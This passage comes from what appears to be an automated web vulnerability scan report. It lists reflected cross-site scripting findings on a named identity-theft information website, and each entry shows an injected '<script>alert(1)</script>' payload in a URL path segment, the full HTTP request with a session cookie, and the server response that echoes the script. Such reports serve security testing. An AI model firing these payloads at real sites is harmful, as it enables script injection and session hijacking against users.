The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5428"><script>alert(1)</script>45b1081903f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menusb5428"><script>alert(1)</script>45b1081903f/superfish/js/superfish.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:52:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:52:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menusb5428"><script>alert(1)</script>45b1081903f/superfish/js/superfish.js?i">
...[SNIP]...

6.317. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/superfish.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b4e2"><script>alert(1)</script>46468d571a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish7b4e2"><script>alert(1)</script>46468d571a6/js/superfish.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish7b4e2"><script>alert(1)</script>46468d571a6/js/superfish.js?i">
...[SNIP]...

6.318. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/superfish.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2426d"><script>alert(1)</script>2ca3cf58e73 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish/js2426d"><script>alert(1)</script>2ca3cf58e73/superfish.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:54:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:54:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish/js2426d"><script>alert(1)</script>2ca3cf58e73/superfish.js?i">
...[SNIP]...

6.319. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/superfish.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90ba7"><script>alert(1)</script>e015d1b9c94 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish/js/superfish.js90ba7"><script>alert(1)</script>e015d1b9c94?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:55:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:55:54 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish/js/superfish.js90ba7"><script>alert(1)</script>e015d1b9c94?i">
...[SNIP]...

6.320. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/jquery.domec.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0357"><script>alert(1)</script>04d12f9d6d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesd0357"><script>alert(1)</script>04d12f9d6d9/all/themes/fightid/jquery.domec.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sitesd0357"><script>alert(1)</script>04d12f9d6d9/all/themes/fightid/jquery.domec.js?i">
...[SNIP]...

6.321. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/jquery.domec.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f30d1"><script>alert(1)</script>106044baca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allf30d1"><script>alert(1)</script>106044baca/themes/fightid/jquery.domec.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:25 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/allf30d1"><script>alert(1)</script>106044baca/themes/fightid/jquery.domec.js?i">
...[SNIP]...

6.322. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/jquery.domec.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a686"><script>alert(1)</script>321a8f874ac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes8a686"><script>alert(1)</script>321a8f874ac/fightid/jquery.domec.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:51:57 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:51:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/themes8a686"><script>alert(1)</script>321a8f874ac/fightid/jquery.domec.js?i">
...[SNIP]...

6.323. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/jquery.domec.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ebe5"><script>alert(1)</script>ca8c9ff7407 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/fightid9ebe5"><script>alert(1)</script>ca8c9ff7407/jquery.domec.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/themes/fightid9ebe5"><script>alert(1)</script>ca8c9ff7407/jquery.domec.js?i">
...[SNIP]...

6.324. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/jquery.domec.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89f98"><script>alert(1)</script>c582d65e942 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/fightid/jquery.domec.js89f98"><script>alert(1)</script>c582d65e942?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:54:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:54:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/themes/fightid/jquery.domec.js89f98"><script>alert(1)</script>c582d65e942?i">
...[SNIP]...

6.325. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/script.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48ed9"><script>alert(1)</script>15270fde275 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites48ed9"><script>alert(1)</script>15270fde275/all/themes/fightid/script.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:49:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:49:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites48ed9"><script>alert(1)</script>15270fde275/all/themes/fightid/script.js?i">
...[SNIP]...

6.326. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25eeb"><script>alert(1)</script>f2c1901645a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all25eeb"><script>alert(1)</script>f2c1901645a/themes/fightid/script.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:30 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all25eeb"><script>alert(1)</script>f2c1901645a/themes/fightid/script.js?i">
...[SNIP]...

6.327. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/script.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c63a"><script>alert(1)</script>476cd57dc5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes6c63a"><script>alert(1)</script>476cd57dc5b/fightid/script.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:51:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:51:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/themes6c63a"><script>alert(1)</script>476cd57dc5b/fightid/script.js?i">
...[SNIP]...

6.328. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/script.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f618a"><script>alert(1)</script>ddeba6afe1c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/fightidf618a"><script>alert(1)</script>ddeba6afe1c/script.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/themes/fightidf618a"><script>alert(1)</script>ddeba6afe1c/script.js?i">
...[SNIP]...

6.329. http://www.fightidentitytheft.com/sites/all/themes/fightid/script.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/script.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08d8"><script>alert(1)</script>31e2d77dde4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/fightid/script.jsd08d8"><script>alert(1)</script>31e2d77dde4?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:54:28 GMT
